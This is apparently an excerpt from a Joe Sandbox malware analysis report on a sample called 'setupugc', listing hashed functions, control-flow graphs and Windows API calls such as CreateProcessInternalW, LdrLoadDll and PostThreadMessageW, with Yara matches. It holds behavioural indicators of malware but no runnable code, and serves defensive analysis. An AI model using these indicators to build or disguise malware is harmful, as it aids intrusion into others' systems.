                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 98ca8c95f95cfc9cbce0f986c6de937c69d5c7f892423747dcd5aae603f95e83
                • Instruction ID: ffcb3f82d4a775c9a2271ac5f5e0c3059a9294da89af3985c622be28fa6e2a5d
                • Opcode Fuzzy Hash: 98ca8c95f95cfc9cbce0f986c6de937c69d5c7f892423747dcd5aae603f95e83
                • Instruction Fuzzy Hash: 0790026134144882D100B5584814B460019C7E1301F55C015E1065754E8759CD926A26
                Function 036A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2a6c2e066adf04c585571cdf4e75907286337179f0681f5e404bc873cb209a2d
                • Instruction ID: c19059a1969165ea831d0149fe7eabb7f2c8be9ce4f1125a03c606453ed947a5
                • Opcode Fuzzy Hash: 2a6c2e066adf04c585571cdf4e75907286337179f0681f5e404bc873cb209a2d
                • Instruction Fuzzy Hash: 60900221211C4482D200B9684C14B47001987D0303F55C115A0155754DCA5589A15E21
                Function 036A2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: daf3f3dff54ccd463b0604e7b0b1b168f337a16edb736f4859cc11774340798b
                • Instruction ID: 73be91965cc03e2f28ddd69fb17d1e9e194264c18d58b0718f46262c1458235e
                • Opcode Fuzzy Hash: daf3f3dff54ccd463b0604e7b0b1b168f337a16edb736f4859cc11774340798b
                • Instruction Fuzzy Hash: 12900221601444828140B5688C449464019ABE1211755C121A0999750E869989A55F65
                Function 036A2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: f235d8bc8e0794a4a7be06f29340debc4801d3e1cc30b4b7297359c4cfd980cd
                • Instruction ID: a8e3a7c2db3c9ccb2ba0fc30ab70aaaf3df04a83316d27d1ec5fd9233a95c3bd
                • Opcode Fuzzy Hash: f235d8bc8e0794a4a7be06f29340debc4801d3e1cc30b4b7297359c4cfd980cd
                • Instruction Fuzzy Hash: CC90026120184843D140B9584C04647001987D0302F55C011A2065755F8B698D916A35
                Function 036A2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ab356e18533e016f399c4be46eb559231629cab1c4b1b3790a3eef253f2750e5
                • Instruction ID: c87f9ef7edc653fd503c5c3908b62b608feb788c43dadcf9646f1220e89a846b
                • Opcode Fuzzy Hash: ab356e18533e016f399c4be46eb559231629cab1c4b1b3790a3eef253f2750e5
                • Instruction Fuzzy Hash: C190022160144942D101B5584804656001E87D0241F95C022A1025755FCB658AD2AA31
                Function 036A2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 719823e28f85cf8f9926821cc51ade453698bc49d8e1a3e874d0e1dfcaf03e7e
                • Instruction ID: 5c51f534ffbfcf52c0e90c857b43bd304863759a5ba4fc685bbcbcfbf3784367
                • Opcode Fuzzy Hash: 719823e28f85cf8f9926821cc51ade453698bc49d8e1a3e874d0e1dfcaf03e7e
                • Instruction Fuzzy Hash: 0490022130144443D140B55858186464019D7E1301F55D011E0415754DDA5589965B22
                Function 036A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8ea404dd2240959de3c1e21f845e8f8eda8f66c8062a77b0a791f46f86f08794
                • Instruction ID: 5ce3722e11dbc42b6e59d8defa48f43f310172074a8cc6c965dd216c302acece
                • Opcode Fuzzy Hash: 8ea404dd2240959de3c1e21f845e8f8eda8f66c8062a77b0a791f46f86f08794
                • Instruction Fuzzy Hash: B390022921344442D180B558580864A001987D1202F95D415A0016758DCA5589A95B21
                Function 036A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1dcdd0d8e0911db121daed127e88dfe36b7437bafd36d61daf7652dda7e02d88
                • Instruction ID: 4d913cdeacf038078a32fc0ef61fd2217fcfed07d0a6793c8c5088a89f77fabc
                • Opcode Fuzzy Hash: 1dcdd0d8e0911db121daed127e88dfe36b7437bafd36d61daf7652dda7e02d88
                • Instruction Fuzzy Hash: 7D90023120144853D111B5584904747001D87D0241F95C412A0425758E97968A92AA21
                Function 036A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 7dcc793e21b852bccd91143764d632bb2881014059cb942fea621e37ffde362b
                • Instruction ID: 31659203ec981f7fe2c5eb27a43e0dc13996504b81b2ca8bd3ce6c890a9067f6
                • Opcode Fuzzy Hash: 7dcc793e21b852bccd91143764d632bb2881014059cb942fea621e37ffde362b
                • Instruction Fuzzy Hash: 5E900221242485929545F5584804547401A97E0241795C012A1415B50D86669996DF21
                Function 036A2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: e5d06b00408b3ce1358e8e965d10eaeca4a46276715114a6126079aecac93af2
                • Instruction ID: 23f63753b65788075746294c400e83de35c0c85fc88632f2d99dd3162a682fa7
                • Opcode Fuzzy Hash: e5d06b00408b3ce1358e8e965d10eaeca4a46276715114a6126079aecac93af2
                • Instruction Fuzzy Hash: E090023120144C82D100B5584804B86001987E0301F55C016A0125754E8755C9917E21
                Function 036A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 704fd83c0a4977b248cc6fbb55018fb3c2f69b5855d0a783080e5438ecc27bbd
                • Instruction ID: c5ab639f79e33656ac9a0660d294ab0a42499dd5188e4981d04c737be758c92e
                • Opcode Fuzzy Hash: 704fd83c0a4977b248cc6fbb55018fb3c2f69b5855d0a783080e5438ecc27bbd
                • Instruction Fuzzy Hash: 6B9002312014CC42D110B558880478A001987D0301F59C411A4425758E87D589D17A21
                Function 036A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 3d2adb663a713a8113c1f4f23d41fae5700c6bff46f9ef6ea7df651a17137166
                • Instruction ID: 771e841a94f9ad5a940b3522c83dbaf1fca265d8e1854ab66d84386d254d36a0
                • Opcode Fuzzy Hash: 3d2adb663a713a8113c1f4f23d41fae5700c6bff46f9ef6ea7df651a17137166
                • Instruction Fuzzy Hash: 3290023120144842D100B9985808686001987E0301F55D011A5025755FC7A589D16A31
                Function 036A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c6d3de48a824b9060268acf8fdab9c730f76143e2b3956576315bce6aebde71a
                • Instruction ID: 8dee825a8dafc338d3d2d9df318bf426dd8c3b0e969104482905c78317173682
                • Opcode Fuzzy Hash: c6d3de48a824b9060268acf8fdab9c730f76143e2b3956576315bce6aebde71a
                • Instruction Fuzzy Hash: 8F90023160554842D100B5584914746101987D0201F65C411A0425768E87D58A916EA2
                Function 036A39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 53adff3cf791ea703382dbfb0cb83545b886f4558f24970add084f0c41081b72
                • Instruction ID: e69e1244f9d420c189f588913e8298ef61e7945fabe9fb1f7a377f0441a02239
                • Opcode Fuzzy Hash: 53adff3cf791ea703382dbfb0cb83545b886f4558f24970add084f0c41081b72
                • Instruction Fuzzy Hash: 8890022124549542D150B55C48046564019A7E0201F55C021A0815794E869589956B21
                Function 00CF0B6F Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 387 cf0b6f-cf0b78 388 cf0bdf-cf0bfc 387->388 389 cf0b7a-cf0b7d 387->389 392 cf0bfe-cf0c05 388->392 393 cf0c57-cf0c5e 388->393 390 cf0b4f-cf0b54 389->390 391 cf0b7f-cf0b8e 389->391 390->387 391->387 394 cf0b90-cf0bb6 391->394 395 cf0c7a-cf0c7f 392->395 396 cf0c07-cf0c09 392->396 397 cf0c62 393->397 400 cf0c1b 394->400 401 cf0bb8-cf0bdc 394->401 398 cf0c9d-cf0cae 395->398 399 cf0c81-cf0c9b 395->399 402 cf0c0a-cf0c11 396->402 403 cf0c64 397->403 404 cf0ce1-cf0d1f call d0b410 call d0be20 call cf4470 call ce1420 397->404 405 cf0d23-cf0d4a call d01b50 398->405 406 cf0cb0-cf0cb7 398->406 399->398 401->388 402->397 408 cf0c13-cf0c17 402->408 403->402 409 cf0c67-cf0c78 403->409 404->405 417 cf0d4c-cf0d5b PostThreadMessageW 405->417 418 cf0d6a-cf0d70 405->418 406->404 408->400 409->395 417->418 420 cf0d5d-cf0d67 417->420 420->418
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 3h8t0-08$3h8t0-08$a~V
                • API String ID: 0-2215303234
                • Opcode ID: e6f08f86262b08cc159420529e04d3981d934f491bbd702736c8023988af0b9f
                • Instruction ID: ab26d0a64d06b19875077a9dbff9e4aff8cc80feb21a4f4180cb15ed9ae8b8c8
                • Opcode Fuzzy Hash: e6f08f86262b08cc159420529e04d3981d934f491bbd702736c8023988af0b9f
                • Instruction Fuzzy Hash: A751E13290428D6FCB12CF708CC6AEEBFB9EE42744B18419CE9946B143D6258D06C7E2
                Function 00CF0CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 516 cf0ce0-cf0d4a call d0b410 call d0be20 call cf4470 call ce1420 call d01b50 529 cf0d4c-cf0d5b PostThreadMessageW 516->529 530 cf0d6a-cf0d70 516->530 529->530 531 cf0d5d-cf0d67 529->531 531->530
                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 00CF0D57
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396
                • Opcode ID: 155abccc208a26b06edeadb5fcc03e029c8794978c5d0c17ca798ee7bc69e911
                • Instruction ID: 5643e10667136cff7fa80a3e92af308f46086dec1df7cf8470e6fdf14bc16632
                • Opcode Fuzzy Hash: 155abccc208a26b06edeadb5fcc03e029c8794978c5d0c17ca798ee7bc69e911
                • Instruction Fuzzy Hash: 05018471D0020C7ADB11ABE58C81EFFBB7CDF41794F048065FA18A7241D6745E068BB1
                Function 00CF0CDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 597 cf0cdc-cf0d5b PostThreadMessageW 599 cf0d5d-cf0d67 597->599 600 cf0d6a-cf0d70 597->600 599->600
                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 00CF0D57
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396
                • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                • Instruction ID: 7cd547fb1c5bc77b2158b5694fa4a32448cc8f0b4a75ec5742445e19859099a6
                • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                • Instruction Fuzzy Hash: 72D0A722A4510C65835351E96C419BDBB7CE982A51B1001B7EE04C0012F505451A1AE3
                Function 00D039D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: f259ab0ec36756b1f4674d311f2109ed7917bc5333d36eb1466bf8f58afe42e8
                • Instruction ID: 965c2933d2c2100678e8719a3f34cfce44391d230edef449140aa7d518b865b1
                • Opcode Fuzzy Hash: f259ab0ec36756b1f4674d311f2109ed7917bc5333d36eb1466bf8f58afe42e8
                • Instruction Fuzzy Hash: 3A318DB1600605BBD714DFA4C881FEBB7BCEB88714F144519B65DAB281D770AA40CBB4
                Function 00CFF43A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: InitializeUninitialize
                • String ID: @J7<
                • API String ID: 3442037557-2016760708
                • Opcode ID: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                • Instruction ID: 51ae88f543af510af335a556019bc4c8294aa762576c80ee4ad5efc787afff19
                • Opcode Fuzzy Hash: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                • Instruction Fuzzy Hash: EE3152B6A0060A9FDB00DFD8DC809EFB7B9FF88304B108559E515EB254D771EE468BA1
                Function 00CFF440 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: InitializeUninitialize
                • String ID: @J7<
                • API String ID: 3442037557-2016760708
                • Opcode ID: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                • Instruction ID: 8242fefe0d5b5747c2ebfc78776489491ff2c3b82f12f82620426a01abf96039
                • Opcode Fuzzy Hash: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                • Instruction Fuzzy Hash: F33152B6A002099FDB00DFD8D8809EFB7B9FF88304B108559E515EB254D771EE468BA1
                Function 00CF4470 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00CF44E2
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                • Instruction ID: 412be88c11bdb39e5a7a16a4c2fc6d8434231dac2315aa972170b16db4fca1cf
                • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                • Instruction Fuzzy Hash: 930100B5E0020DA7DB14DBE4DC42F9EB7789B54308F004695AA18A7181F631EB54CB61
                Function 00D096C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessInternalW.KERNEL32(?,?,?,?,00CF826E,00000010,?,?,?,00000044,?,00000010,00CF826E,?,?,?), ref: 00D09723
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                • Instruction ID: e4959a1d2750700a3e3e5e24bba760e65a2881d6178a8b464b6785c20b35e8c7
                • Opcode Fuzzy Hash: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                • Instruction Fuzzy Hash: 580184B2205508BBDB54DF99DC81EEB77ADAF8C754F148208FA19A3241D630F9518BA4
                Function 00CE9BA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00CE9BE5
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                • Instruction ID: 2b084c8b99b7906c1d98ecfba19f380e55bd85b45b0e01b70472cf88024dee58
                • Opcode Fuzzy Hash: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                • Instruction Fuzzy Hash: 5CF0397338020436E22162AAAC02FDBB28CCB80BA1F140025FA1CEA2C1D9A1B94182B5
                Function 00CF4463 Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00CF44E2
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                • Instruction ID: fd0f6d10c82fbf4527b1942ae2d1a3189233535e33218c10ad70663dfe12b7a4
                • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                • Instruction Fuzzy Hash: 55F09071E4010DABDF10DAD4D881FE9B7B4EB54318F0083D5EA1C9B280E5319A188B91
                Function 00CE9B9C Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00CE9BE5
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                • Instruction ID: 0b98c6bead18fb0986d27995071ee642a5654fc2be3a7731d933736010ae8c0f
                • Opcode Fuzzy Hash: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                • Instruction Fuzzy Hash: 97E0927378024036E23162A59C43FDB665CCF84B50F140055F71CAB1C1D9A1B54183B4
                Function 00D095E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00CF1979,?,00D0571B,00CF1979,00D055AF,00D0571B,?,00CF1979,00D055AF,00001000,?,?,00000000), ref: 00D0961F
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
